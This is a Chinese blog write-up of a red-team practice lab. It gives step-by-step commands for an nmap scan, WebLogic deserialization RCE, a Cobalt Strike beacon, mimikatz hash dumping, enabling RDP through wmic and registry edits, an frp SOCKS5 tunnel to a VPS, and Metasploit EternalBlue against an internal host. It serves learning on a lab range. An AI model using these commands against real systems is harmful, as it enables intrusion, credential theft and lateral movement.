内网渗透学习

这里挑战的渗透测试红队的靶场(没打通,太菜了

目标IP为192.168.5.110

首先使用nmap扫描常见端口信息:(实战用命令速度快

nmap -v -Pn -T3 -sV -n -sS --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 192.168.5.110

参数详解:

  1. -Pn: 跳过主机发现阶段
  3. --open 输出开放端口
  5. -v:详细输出
  7. -T3:扫描速率 T1-T5
  9. -P:指定端口

发现7001端口放,weblogic无疑

渗透红队星球靶场学习 - 图1

访问控制台路径:发现是weblogic 12.1.3版本,搜索一波可知该版本存在很多直接rce漏洞

https://blog.csdn.net/qq_45742511/article/details/118540694

渗透红队星球靶场学习 - 图2

利用反序列化利用工具首先进行信息收集:

发现两张网卡,即存在内网网段

渗透红队星球靶场学习 - 图3

net user /domain 发现不存在域环境

渗透红队星球靶场学习 - 图4

管理员权限

渗透红队星球靶场学习 - 图5

该机器出网

渗透红队星球靶场学习 - 图6

tasklist /svc 查询是否存在杀软

https://payloads.net/kill_software/

渗透红队星球靶场学习 - 图7

这里利用cs powershell 直接上线

渗透红队星球靶场学习 - 图8

渗透红队星球靶场学习 - 图9

beacon sleep 1 调整心跳速率(实战中可以调为5左右避免流量过于明显

systeminfo查看主机名为 Microsoft Windows Server 2012 R2 Datacenter

该版本不能直接抓取明文密码

渗透红队星球靶场学习 - 图10

运行猕猴桃抓取hash密码:

渗透红队星球靶场学习 - 图11

sha1解密为弱口令:

渗透红队星球靶场学习 - 图12

netstat -ano 查询3389端口是否开启:

渗透红队星球靶场学习 - 图13

发现3389端口没有开启

依次运行以下命令开启3389

  1. wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
  2. wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
  3. reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

渗透红队星球靶场学习 - 图14

渗透红队星球靶场学习 - 图15

netstat -ano 查询3389端口发现开启成功

渗透红队星球靶场学习 - 图16

然并卵,防火墙原因连不上

渗透红队星球靶场学习 - 图17

上传fscan进行c段扫描:

shell fscan64.exe -h 10.10.20.12/24

发现内网存在一台永恒之蓝主机(这里扫到其他主机是因为连的校园网

渗透红队星球靶场学习 - 图18

  1. frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCPUDPHTTPHTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

这里需要建立一条frp隧道:

渗透红队星球靶场学习 - 图19

公网vps为服务端

配置文件 frps.ini,然后运行 ./frps -c frps.ini

  1. [common]bind_addr =0.0.0.0bind_port = 7000

之后来到目标跳板机器配置文件 frps.ini, 然后运行 frpc:./frpc -c frpc.ini

  1. [common]server_addr = 192.168.0.175server_port = 7000[plugin_socks]type = tcpremote_port = 7777plugin = socks5

渗透红队星球靶场学习 - 图20

vps上查看连接成功:

渗透红队星球靶场学习 - 图21

启动msf

渗透红队星球靶场学习 - 图22

建立好 socks5 隧道后

利用永恒之蓝拿到 Meterpreter 会话:

  1. msf6 > setg Proxies socks5:ip:7777 //这里设置ip为vps服务端ip
  2. msf6 > setg ReverseAllowProxy truemsf6 > use exploit/windows/smb/ms17_010_eternalblue //永恒之蓝exp
  3. msf6 > set payload windows/x64/meterpreter/bind_tcp //因为win7这台主机可能不出网,使用正向shell
  4. msf6 > set rhost 10.10.20.7
  5. msf6 > run

Meterpreter 命令参考:https://www.cnblogs.com/backlion/p/9484949.html,[https://www.anquanke.com/post/id/164525](https://www.anquanke.com/post/id/164525)

渗透红队星球靶场学习 - 图23

拿到msfshell后查看目标信息:

渗透红队星球靶场学习 - 图24

切换shell,发现不出网,

这里使用cs生成中转监听器

渗透红队星球靶场学习 - 图25

渗透红队星球靶场学习 - 图26

生成木马后,利用msf上传到目标服务器运行:

Meterpreter 命令为

upload /tmp/beacon1.exe c:
execute -f c:/beacon1.exe

这里不造是不是环境问题,cs木马在win7上运行不了,更换参数也一样(吐了,内网漫游到此结束

渗透红队星球靶场学习 - 图27

渗透红队星球靶场学习 - 图28

如果上线成功大概是这样的,原理就是把不出网主机的流量转发到出网这台主机上:

渗透红队星球靶场学习 - 图29

这台靶机后面还有很多,因为一直卡在win7这台主机上,心态崩了,就看其他大佬秀把(呜呜

https://www.freebuf.com/articles/web/305339.html